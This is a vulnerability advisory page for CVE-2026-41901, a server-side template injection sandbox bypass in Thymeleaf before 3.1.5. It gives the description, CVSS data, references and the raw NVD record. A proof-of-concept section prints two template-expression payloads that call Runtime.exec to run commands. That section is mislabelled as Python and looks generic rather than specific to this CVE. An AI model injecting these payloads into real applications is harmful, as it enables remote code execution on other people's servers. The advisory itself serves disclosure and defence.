CVE-2026-41901

Description

Thymeleaf is a server-side Java template engine for web and standalone environments. Prior to 3.1.5.RELEASE, a security bypass vulnerability exists in the expression execution mechanisms of Thymeleaf. Although the library provides mechanisms to avoid the execution of potentially dangerous expressions in some specific sandboxed (restricted) contexts, it fails to properly neutralize specific constructs that allow this kind of expressions to be executed. If an application developer passes to the template engine unsanitized variables that contain such expressions, and these values are used in sandboxed contexts inside the templates, these expressions can be executed achieving Server-Side Template Injection (SSTI). This vulnerability is fixed in 3.1.5.RELEASE.

CVSS Details

CVSS Score

9.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Thymeleaf < 3.1.5.RELEASE

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC Concept for Thymeleaf SSTI Sandbox Bypass
Target: Thymeleaf < 3.1.5.RELEASE
Context: User controlled input reflected in a sandboxed template expression.
-->

// Payload 1: Direct execution attempt (Depending on sandbox strictness)
${T(java.lang.Runtime).getRuntime().exec('calc.exe')}

// Payload 2: Using preprocessing/bypass techniques often found in template engines
// This attempts to obfuscate the execution flow to bypass basic filters.
__${T(java.lang.Runtime).getRuntime().exec('touch /tmp/pwned')}__::.x

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41901
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41901
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41901/
[4] VulDB https://vuldb.com/cve/CVE-2026-41901
[5] https://github.com/thymeleaf/thymeleaf/security/advisories/GHSA-c9ph-gxww-7744

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41901", "sourceIdentifier": "[email protected]", "published": "2026-05-12T23:16:17.060", "lastModified": "2026-05-13T16:10:57.817", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Thymeleaf is a server-side Java template engine for web and standalone environments. Prior to 3.1.5.RELEASE, a security bypass vulnerability exists in the expression execution mechanisms of Thymeleaf. Although the library provides mechanisms to avoid the execution of potentially dangerous expressions in some specific sandboxed (restricted) contexts, it fails to properly neutralize specific constructs that allow this kind of expressions to be executed. If an application developer passes to the template engine unsanitized variables that contain such expressions, and these values are used in sandboxed contexts inside the templates, these expressions can be executed achieving Server-Side Template Injection (SSTI). This vulnerability is fixed in 3.1.5.RELEASE."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-917"}, {"lang": "en", "value": "CWE-1336"}]}], "references": [{"url": "https://github.com/thymeleaf/thymeleaf/security/advisories/GHSA-c9ph-gxww-7744", "source": "[email protected]"}]}}